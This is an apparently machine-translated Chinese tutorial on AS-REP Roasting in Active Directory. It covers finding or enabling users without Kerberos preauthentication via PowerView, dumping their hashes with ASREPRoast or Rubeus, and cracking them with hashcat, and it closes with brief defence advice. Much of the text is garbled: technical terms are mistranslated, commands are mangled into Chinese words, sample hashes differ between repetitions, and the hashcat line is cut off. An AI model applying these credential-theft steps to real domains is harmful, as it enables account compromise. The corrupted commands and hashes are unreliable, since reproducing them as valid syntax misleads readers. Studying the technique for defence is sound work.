域渗透——作为-重铸

0x00 前言

砷焙烧同Kerberoasting类似，如果满足条件，就能够获得用户口令的哈希，再结合哈希卡特进行破解，最后能够还原出用户的明文口令。

本文将要参考公开资料，结合自己的理解，介绍砷焙烧的利用方法，最后给出防御建议。

0x01 简介

本文将要介绍以下内容：

砷焙烧的原理

砷焙烧的利用条件

砷焙烧的利用方法

破解混杂的方法

防御建议

0x02 AS-REP Roasting

1.简介

对于域用户，如果设置了选项"不需要麻省理工学院开发的安全认证系统预身份验证",此时向域控制器的88端口发送按要求请求，对收到的组件代表内容重新组合，能够拼接成" Kerberos 5 AS-REP etype 23"(18200)的格式，接下来可以使用哈希卡特对其破解，最终获得该用户的明文口令

2.利用前提

域用户设置了选项"不需要麻省理工学院开发的安全认证系统预身份验证"

通常情况下，该选项默认不会开启

3.利用思路

通常在域渗透中用来维持权限

需要先获得对指定用户的泛型写入权限，利用思路如下：

开启用户选项"不需要麻省理工学院开发的安全认证系统预身份验证"

导出混杂并破解

关闭用户选项"不需要麻省理工学院开发的安全认证系统预身份验证"

0x03 AS-REP Roasting的利用方法

1.寻找满足条件的用户

用户需要开启选项"不需要麻省理工学院开发的安全认证系统预身份验证"

这里可以使用轻量级目录访问协议查询满足条件（用户帐户控制：1 .2 .840 .113556 .1 .4 .803:=4194304)的用户

参考资料：

https://支持。微软。如何使用用户帐户控制来操作用户帐户属性

https://github。com/powershell mafia/PowerSploit/blob/445 f7b 2510 c 4553 DCD 9451 BC 4 da CCB 20 c 8 e 67 cbb/Recon/power view。PS1 # l 4769

DONT _请求_预先授权项对应的值为4194304

PowerView的命令如下：

导入模块. PowerView.ps1

get-domain user-PreauthNotRequired-Verbose

示例如下图

只显示distinguishedname项：

导入模块. PowerView.ps1

get-domain user-PreauthNotRequired-Properties可分辨名称-Verbose

示例如下图

2.开启和关闭选项”Do not require Kerberos preauthentication”

开启选项意味着对用户添加属性（用户帐户控制=4194304)

开启选项的命令如下：

导入模块. PowerView.ps1

set-domain object-Identity test b-XOR @ {用户帐户控制=4194304 }-Verbose

关闭选项意味着删除用户属性（用户帐户控制=4194304)

注：

这里可以再次进行异或运算，两次异或相当于不改变原数值，即删除用户属性（用户帐户控制)

关闭选项的命令如下：

导入模块. PowerView.ps1

set-domain object-Identity test b-XOR @ {用户帐户控制=4194304 }-Verbose

3.导出hash

(1)使用Powershell

https://github.com/HarmJ0y/ASREPRoast

导出所有可用用户混杂的命令如下：

导入模块\ASREPRoast.ps1

Invoke-ASREPRoast -Verbose |fl

示例如下图

导出指定用户混杂的命令如下：

get-as repash-UserName测试b-Verbose

示例如下图

提取出哈希：

$ krb 5作为代表$ testb @ test。com:a 128092441 a 3 af 80015554 db 2 f 3 Fe 44 e $ d 69 b 44 c 7d 9 cf 36261 a 012d 012 f 636 a 2124837 af 89 a 48 ef 686 E1 AC 7572 af 93741 fc 80142343 a 85 c 9 aa CD 6 a5 f 85 f1 d 840d 07 b 09 e 68795 ce

(2)使用C#(Rubeus)

https://github.com/GhostPack/Rubeus

命令如下：

Rubeus.exe阿斯普罗斯特

示例如下图

4.使用hashcat进行破解

提取出哈希：

$ krb5 ASR EP $ test @ test。com:a 128092441 a 3 af 800015554 db 2 F3 fe44 e $ d69b 44 c 7 d9 cf 36261 a 012d 012 f 636 a 214748368 af 89 a 48 ef 686 e 1 AC 7572 af 93741 fc 8001423443 a 85 C9 aacd 6 a 5f 85 f1 d 840d 07 b 09 e 6877

拼接成哈希猫能够识别的格式需要在$krb5asrep后面添加23块钱

哈希猫使用字典破解的参数如下：

hashcat-m 18200 ' $ krb5 ASR EP $ 23 $ test @ test。com:a 128092441 a 3af 800015554 db 2 F3 fe44 e $ d69b 44 c 7 d9 cf 36261 a 012d 012 f 636 a 212248837 af 89 a 48 ef 686 e 1 AC 7572 af 93741 fc 800142344 a 85 C9 aacd 6 a 5f 85 f1 d 840 d07b 09 e 68795

参数说明：

/usr/share/john/password.lst文件为字典文件的位置

-或found.txt表示输出结果的位置

0x04 防御建议

1.确保域内不存在开启"不要求麻省理工学院开发的安全认证系统预先验证"的用户

扫描方法（使用PowerView:

导入模块. PowerView.ps1

get-domain user-pre authenticated-verbose-取得网域使用者-预先验证我们的平衡-动词

2.域用户强制使用复杂口令，提高被字典和暴力破解的难度

0x05 小结

本文介绍了as-rep咆哮(代表咆哮)在域渗透中的利用条件和方法，给出防御建议

留下一个答案